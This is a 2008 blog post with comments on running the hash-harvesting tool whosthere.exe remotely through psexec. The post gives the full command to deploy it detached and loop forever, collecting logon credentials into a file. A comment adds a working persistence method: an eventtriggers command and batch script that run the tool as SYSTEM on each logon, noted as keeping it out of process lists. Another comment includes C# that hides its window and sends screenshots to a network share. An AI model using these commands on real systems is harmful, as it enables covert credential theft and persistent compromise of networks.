Thursday, May 08, 2008

Using whosthere.exe with psexec

Ok, a few days ago I received the following question and I have been asked the same thing before so here it goes:

The question, more or less, is:

How do you run whosthere.exe into a remote machine using psexec dettached from any console and leave it running there collecting hashes?

the answer is:

psexec \\ -d -c whosthere.exe -o myhashes.log -i

psexec's -d switch basically makes it run whosthere.exe and exit.
whosthere's -o switch specifies the name of the file containing the list of unique credentials collected.
and the -i switch makes whosthere.exe run in an infinte loop looking for new
logon credentials and storing them on the file specified by the -o switch.

Remember, of course, you will probably need to specify the -u and -p switch to psexec, or you can do from your machine something like

net use \\\ipc$ * /u:user password

and then run psexec.

Also remember, that if you want to use whosthere-alt.exe, you can't use psexec's -c switch (I think), because whosthere-alt.exe also requires the pth.dll, so you will probably need to copy whosthere-alt.exe and pth.dll to the target machine and then run psexec without the -c switch and specifying the path where whosthere-alt.exe and pth.dll are located.

Hope it helps!.

3 comments:

natron[at]invisibledenizen.org said...

I prefer to attach the usage of whosthere to the Windows event log so that it will only run whenever someone logs on, and will also be sure to catch any short, automated logins that only last for 1 or 2 seconds. This has the added benefit of not being listed in the running processes for more than a very brief instant.

You can tie the command directly with eventtriggers if you want, but I prefer to use a simple batch script to capture date/time info and the EID that triggered it. I've included both below.

You can use PSEXEC to launch a remote command shell (use PSEXEC's interactive switch and tell it to run cmd.exe) and enter the eventtriggers command that way. I've also used WinRAR SFX packages to zip up whosthere.exe, run_whosthere.bat, and an installer batch file that will move the files to the correct locations and issue the eventtriggers command for me. Then you just run psexec once and you're done.

Regards,
N

The command to tie it to an event id is:

eventtriggers.exe /create /l Security /t SUCCESSAUDIT /ru SYSTEM /eid #EID value# /tr wt_#EID value# /tk "C:\path\to\the\file\run_whosthere.bat #EID value#"

And here's the batch file I use:
::==run_whosthere.bat
setLocal EnableDelayedExpansion

@echo off
REM You can attach this to the event ID for network logons by issuing the following at the command prompt (replace EID with the value that you are interested in. I usually attach to 528, 540, and 552.
REM http://www.ultimatewindowssecurity.com/securitylog/Event.aspx?EventID=528
REM http://www.ultimatewindowssecurity.com/securitylog/Event.aspx?EventID=540
REM http://www.ultimatewindowssecurity.com/securitylog/Event.aspx?EventID=552
REM eventtriggers.exe /create /l Security /t SUCCESSAUDIT /ru SYSTEM /eid #EID value# /tr wt_#EID value# /tk "D:\path\to\the\file\run_whosthere.bat #EID value#"

:: Count the number of whosthere_output files
for /f %%J in ('dir /b/od whosthere_output_*') do (set latest=%%~nJ)

:: Copy the old file to the new name, delete the old file
set NEW=%latest:~17,7%
set OLD=%NEW%
set /a NEW+=1
COPY whosthere_output_%OLD%.txt whosthere_output_%NEW%.txt >NUL
DEL whosthere_output_%OLD%.txt

:: If you use the eventtriggers.exe command from above, you will be passing the EID that occurred. Record that here and dump the notice to the logfile.
set /a EID = %1%
ECHO. ******************** Logon EID %EID% %Date% %Time% ******************** >> whosthere_output_%NEW%.txt

:: Run whosthere using the output file option.
whosthere.exe -o whosthere_output_%NEW%.txt

Anonymous said...

I’m trying to run psexec with an exe that contains this line of code:
gfx.CopyFromScreen(0, 0, 0, 0, new Size(screenWidth, screenHeight), CopyPixelOperation.SourceCopy);

It will hit an exception when run on a remote computer, but runs fine locally.

This is the exception:
Unhandled Exception: System.ComponentModel.Win32Exception: The handle is invalid

at System.Drawing.Graphics.CopyFromScreen(Int32 sourceX, Int32 sourceY, Int32
destinationX, Int32 destinationY, Size blockRegionSize)
at TakeScreenShot.Program.Main(String[] args)
c:\browsershotsexes\TakeScreenShot.exe exited on TestVistaErtang with error code
-532459699.

Thanks, Eric


PS This is all the code for the exe:

using System;
using System.Collections;
using System.Text;
using System.Drawing.Imaging;
using System.Drawing;
using System.Windows.Forms;
using System.Runtime.InteropServices;
//using SnipLib;
//using MS.Internal.Test.Tools

namespace TakeScreenShot
{
class Program
{
#region Console Window property stuff
[DllImport("kernel32.dll", ExactSpelling = true)]
private static extern IntPtr GetConsoleWindow();

private static IntPtr ThisConsole = GetConsoleWindow();

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
private const int HIDE = 0;
private const int MAXIMIZE = 3;
private const int MINIMIZE = 6;
private const int RESTORE = 9;
#endregion
static void Main(string[] args)
{

ShowWindow(ThisConsole, HIDE); //Hides Console Window
Console.WriteLine("Minimizing the Current Console Window...");
System.Threading.Thread.Sleep(2000);
Rectangle scrBounds = Screen.GetBounds(new Point(0, 0));
int screenWidth = scrBounds.Width;
Console.WriteLine(screenWidth);
int screenHeight = scrBounds.Height;
Console.WriteLine(screenHeight);
using (Bitmap bmpScreenShot = new Bitmap(screenWidth, screenHeight))
{
using (Graphics gfx = Graphics.FromImage((Image)bmpScreenShot))
{

Console.WriteLine(Environment.MachineName);
gfx.CopyFromScreen(0, 0, 0, 0, new Size(screenWidth, screenHeight), CopyPixelOperation.SourceCopy);
bmpScreenShot.Save("\\\\ankursi-vista\\a-ertang\\" + Environment.MachineName + "_" + screenWidth.ToString() + "x" + screenHeight.ToString() + "_test.png", ImageFormat.Png);
}
}
ShowWindow(ThisConsole, RESTORE);
}
}
}

hernan said...

That's probably because your program exe is running in the wrong windowstation.

Please move this question to www.hexale.org/forums so I can work with you on a solution.

Thanks!,
Hernan